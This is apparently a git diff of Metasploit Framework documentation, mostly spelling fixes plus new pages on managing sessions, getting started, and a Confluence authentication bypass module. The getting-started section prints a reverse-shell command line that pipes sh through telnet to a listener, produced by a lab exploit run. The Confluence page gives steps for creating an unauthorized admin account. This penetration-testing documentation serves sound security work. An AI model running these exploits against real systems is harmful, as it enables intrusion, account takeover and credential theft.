+### Killing stale sessions
+
+If `--search` is used in conjunction with `--kill-all`, it will restrict the latter function to only the search results. For example:
+
+```msf
+msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
+[*] Killing matching sessions...
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                     Connection
+  --  ----  ----                     -----------                                     ----------
+  1         meterpreter x86/windows  WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH  192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
+  2         meterpreter x86/windows  WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH  192.168.2.1:4444 -> 192.168.2.132:52192 (192.168.2.132)
+
+[*] 192.168.2.132 - Meterpreter session 1 closed.
+[*] 192.168.2.132 - Meterpreter session 2 closed.
+msf6 payload(windows/meterpreter/reverse_http) >
+```
@@ -73,7 +73,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
 - `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
 - `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
@@ -89,7 +89,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
 - `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
 - `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
 - `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
 - `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
 - `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
@@ -23,7 +23,7 @@ Matching Modules

 There are two ways to launch a Post module, both require an existing session.

-Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
+Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

 ```msf
 msf6 > use post/windows/gather/enum_chrome
@@ -4,7 +4,7 @@ SMB (Server Message Blocks), is a way for sharing files across nodes on a networ

 There are two main ports for SMB:

- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
+- 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
 - 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.

 Other terminology to be aware of:
@@ -10,7 +10,7 @@ Meterpreter even when running on the Windows platform.
 crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
 session to avoid losing access altogether.

-The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefore subject to
 the same limitations.

 The following functions are unavailable:
@@ -2,7 +2,7 @@ Of the many recent changes to Meterpreter, reliable network communication is one

 In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.

-Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
+Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.

 It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.

@@ -27,7 +27,7 @@ Usage: sleep <time>
  shut down and restarted after the designated timeout.
 ```

-As shown, `sleep` expects to be given a single postive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
+As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.

 The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:

@@ -95,7 +95,7 @@ With this shellcode stub wired into the DOS header, Metasploit adds the entire b
 1. Loads the extension DLL into memory.
 1. Calculates the size of the DLL.
 1. Writes the size of the DLL as a 32-bit value to the configuration block.
-1. Writes the entire body of the DLL, as-is, to the end of the conifiguration block.
+1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
 
 Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
 
@@ -28,13 +28,13 @@ In the case of `HTTP/S` payloads it's slightly different because the protocols a

 With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.

-By default, this value is set to `300` seconds (`5` minutes), but can be overidden by the user via the `SessionCommunicationTimeout` setting.
+By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.

 If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.

 #### Retry Total and Retry Wait

-After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be availalble due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
+After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.

 The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.

@@ -69,7 +69,7 @@ OPTIONS:
    -h        Help menu
    -t <opt>  Retry total time (seconds)
    -w <opt>  Retry wait time (seconds)
-    -x <opt>  Expiration timout (seconds)
+    -x <opt>  Expiration timeout (seconds)
 ```
 As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.

@@ -48,7 +48,7 @@ OPTIONS:
    -T <opt>  Retry total time (seconds) (default: same as current session)
    -U <opt>  Proxy username for HTTP/S transports (optional)
    -W <opt>  Retry wait time (seconds) (default: same as current session)
-    -X <opt>  Expiration timout (seconds) (default: same as current session)
+    -X <opt>  Expiration timeout (seconds) (default: same as current session)
    -c <opt>  SSL certificate path for https transport verification (optional)
    -h        Help menu
    -i <opt>  Specify transport by index (currently supported: remove)
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):

 * PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
 * Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode)
- * Allow Meterpreter sesssions to resolve L3 addresses (#4793)
+ * Allow Meterpreter sessions to resolve L3 addresses (#4793)
 * Track whether or not the current session has admin credentials (#4633)d
 * Support Metasploit-side zlib compression of sessions
 * Being able to use Meterpreter instances to easily forward commands & exfil
@@ -1,7 +1,7 @@
 # Install oracle InstantClient


-InstantClient 10 is recommneded to allow you to talk with 8,9,10,&11 server versions.
+InstantClient 10 is recommended to allow you to talk with 8,9,10,&11 server versions.

 Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>

@@ -95,7 +95,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
+All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.

 ```msf
 msf6 post(multi/manage/autoroute) > route flush
@@ -72,13 +72,13 @@ meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
 ```
 The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.

-The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
+The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
 ```msf
 meterpreter > python_execute "print x"
 [+] Content written to stdout:
 [0, 5, 10, 15]
 ```
-As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
+As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
 ```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
 [+] x = [0, 5, 10, 15]
@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag

 The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.

-The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
+The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

 [WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:

 What this means is that from Windows 7 and onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a `407` error the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.

-In order to avoid this issue, [extra work][wininet_fallback] has beeen done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
+In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.

 To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.

@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o

 ## Rescuing unstable modules

-If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similiar `git checkout` to grab the file and then `git mv` it to the right spot again.
+If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.

 ## Safety

@@ -1,8 +1,259 @@
 ## Getting started

-Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
+Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:

-* <http://www.offensive-security.com/metasploit-unleashed/Main_Page>
-* <https://metasploit.help.rapid7.com/docs/>
-* <https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/>
-* <https://github.com/rapid7/metasploitable3>
+```msf
+ _                                                    _
+/ \    /\         __                         _   __  /_/ __
+| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
+| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
+|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
+      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
+
+
+       =[ metasploit v6.3.35-dev-0fc88a8050               ]
+ -- --=[ 2357 exploits - 1227 auxiliary - 413 post       ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]
+
+Metasploit Documentation: https://docs.metasploit.com/
+
+msf6 >
+```
+
+### Finding modules
+
+Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
+
+- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
+- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
+- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
+- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
+
+You can use the `search` command to search for modules:
+
+```msf
+msf6 > search type:auxiliary http html title tag
+
+Matching Modules
+================
+
+   #  Name                          Disclosure Date  Rank    Check  Description
+   -  ----                          ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/title                   normal  No     HTTP HTML Title Tag Content Grabber
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
+
+msf6 >
+```
+
+You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
+active module:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running Auxiliary modules
+
+Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
+extracting the HTTP title from a server:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 auxiliary(scanner/http/title) > show options
+
+Module options (auxiliary/scanner/http/title):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        80               yes       The target port (TCP)
+   SHOW_TITLES  true             yes       Show the titles on the console as they are grabbed
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_NOTES  true             yes       Store the captured information in notes. Use "notes -t http.title" to view
+   TARGETURI    /                yes       The base path
+   THREADS      1                yes       The number of concurrent threads (max one per host)
+   VHOST                         no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/title) > 
+```
+
+To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that 
+the module will run against:
+
+```msf
+msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
+RHOSTS => google.com
+```
+
+The `run` command will run the module against the target, showing the target's HTTP title:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting
+both `RHOSTS` and enabling `HttpTrace` functionality:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 
+
+####################
+# Request:
+####################
+GET / HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+
+
+####################
+# Response:
+####################
+HTTP/1.1 301 Moved Permanently
+Location: http://www.google.com/
+Content-Type: text/html; charset=UTF-8
+Server: gws
+Content-Length: 219
+
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>301 Moved</TITLE></HEAD><BODY>
+<H1>301 Moved</H1>
+The document has moved
+<A HREF="http://www.google.com/">here</A>.
+</BODY></HTML>
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running exploit modules
+
+Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against.
+For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including:
+
+- [Metasploitable2](https://docs.rapid7.com/metasploit/metasploitable-2/) 
+- [Metasploitable3](https://github.com/rapid7/metasploitable3)
+
+For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
+
+```msf
+msf6 > use unix/misc/distcc_exec
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+Exploit modules will generally at a minimum require the following options to be set:
+
+- `RHOST` - The remote target host address 
+- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
+- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > options
+
+Module options (exploit/unix/misc/distcc_exec):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   3632             yes       The target port (TCP)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
+rhost => 192.168.123.133
+msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+```
+
+The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run
+
+[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444 
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo BmpMGFX6NDVlh5h0;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "BmpMGFX6NDVlh5h0\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
+
+whoami
+daemon
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
+
+[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo QqL1Uzom6eBFilyL;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "QqL1Uzom6eBFilyL\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
+
+whoami
+daemon
+```
@@ -41,3 +41,18 @@ These are just suggestions, but it'd be nice if the KB had these sections:
 - **Verification Steps** - Tells users how to use the module and what the expected results are from running the module. 
 - **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. 
 - **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module.
+
+### Before you submit your PR: msftidy_docs.rb
+
+A documentation file can be passed as a positional argument to `metasploit-framework/tools/dev/msftidy_docs.rb` and will
+highlight formatting errors the docs file might contain. Once all the errors and warnings thrown by `msftidy_docs.rb` have
+been resolved, the documentation file is ready for submission.
+
+```
+➜  metasploit-framework git:(upstream-master) ✗ ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/panos_op_cmd_exec.md
+documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [INFO] Missing Section: ## Options
+documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] Please add a newline at the end of the file
+documentation/modules/exploit/linux/http/panos_op_cmd_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps/Module usage, Options, Scenarios
+documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:50 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
+documentation/modules/exploit/linux/http/panos_op_cmd_exec.md:53 - [WARNING] Spaces at EOL
+```
@@ -2,7 +2,7 @@

 Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos
 authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting
-Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage machanism but
+Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage mechanism but
 tickets are stored able to be both exported and imported from [MIT Credential Cache][1] (CCACHE) files. A converter for
 Kirbi to and from CCACHE files is also available in the `auxiliary/admin/kerberos/ticket_converter` module.

@@ -268,7 +268,7 @@ Simultaneous Users: 16777216

 ## Using external tickets with Metasploit
 A ticket obtained outside of Metasploit can be used for authentication by setting the `${Prefix}::Krb5Ccname` option
-which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file formath. If the
+which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file format. If the
 ticket is in the Kirbi format, it must first be converted using the `auxiliary/admin/kerberos/ticket_converter` module.

 When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket
@@ -272,6 +272,10 @@ NAVIGATION_CONFIG = [
          {
            path: 'How-to-use-msfvenom.md',
            nav_order: 7
+          },
+          {
+            path: 'Managing-Sessions.md',
+            nav_order: 8
          }
        ]
      },
@@ -547,6 +551,9 @@ NAVIGATION_CONFIG = [
              {
                path: 'How-to-check-Microsoft-patch-levels-for-your-exploit.md'
              },
+              {
+                path: "How-to-write-a-cmd-injection-module.md"
+              }
            ]
          },
          {
@@ -21,7 +21,7 @@ Shell #1:
 [*] instance i-12345678 status: initializing
 ...
 [*] instance i-12345678 status: ok
-[*] Instance i-12345678 has IP adrress 35.12.4.1
+[*] Instance i-12345678 has IP address 35.12.4.1
 [*] Auxiliary module execution completed
 ```

@@ -56,7 +56,7 @@ can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
 security-groups are used to open access to network ranges and specific TPC/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifyig a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port. 

 ## How it Works

@@ -126,7 +126,7 @@ Advanced Options:

 * `INSTANCE_TYPE`: The instance type
 * `MaxCount`: Maximum number of instances to launch
-* `MinCount`: Minumum number of instances to launch
+* `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
 * `SEC_GROUP_ID`: the EC2 security group to use
@@ -127,7 +127,7 @@ has the [KB5014754][KB5014754] patch applied and the REG_DWORD
 account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value
 of `StrongCertificateBindingEnforcement` to 2. If the server has the patch applied, the SID will be returned in the
 issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the
-SID is not specified in the certificate, then Kerberos authentication wil fail with `KDC_ERR_CERTIFICATE_MISMATCH`.
+SID is not specified in the certificate, then Kerberos authentication will fail with `KDC_ERR_CERTIFICATE_MISMATCH`.

 The user must know:

@@ -0,0 +1,51 @@
+## Vulnerable Application
+This module exploits an Broken Access Control vulnerability in Atlassian Confluence servers leads to Authentication Bypass.
+
+A specially crafted request can be create new admin account without authorization in the Atlassian server.
+
+Affecting Atlassian Confluence from version 8.0.0 to before 8.3.3, from version 8.4.0 before 8.4.3 and from version 8.5.0 before 8.5.2.
+
+## Verification Steps
+
+1. Setting up a working installation of Atlassian Confluence Server before 8.0.0
+2. Start `msfconsole`
+3. `use use auxiliary/admin/http/atlassian_confluence_auth_bypass`
+4. `set RHOST <IP>`
+5. `set RPORT <PORT>`
+6. `check`
+7. You should see `The target is vulnerable`
+8. `set NEW_USERNAME <username>`
+9. `set NEW_PASSWORD <password>`
+10. `run`
+11. You should get a new admin account.
+
+## Options
+### TARGETURI
+Path to Atlassian Confluence installation ("/" is the default)
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges. The username must not contain capital letters.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+### NEW_EMAIL
+E-mail to be used when creating a new user with admin privileges.
+
+## Scenarios
+### Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)
+```
+msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
+msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
+RHOSTS => <YOUR_TARGET>
+msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
+NEW_USERNAME => admin_1337
+msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
+NEW_PASSWORD => admin_1337
+msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
+[*] Running module against <YOUR_TARGET>
+
+[+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
+[+] Now you can login as adminstrator from: http://<YOUR_TARGET>:8090/login.action
+[*] Auxiliary module execution completed
+```
@@ -128,7 +128,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -178,8 +178,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
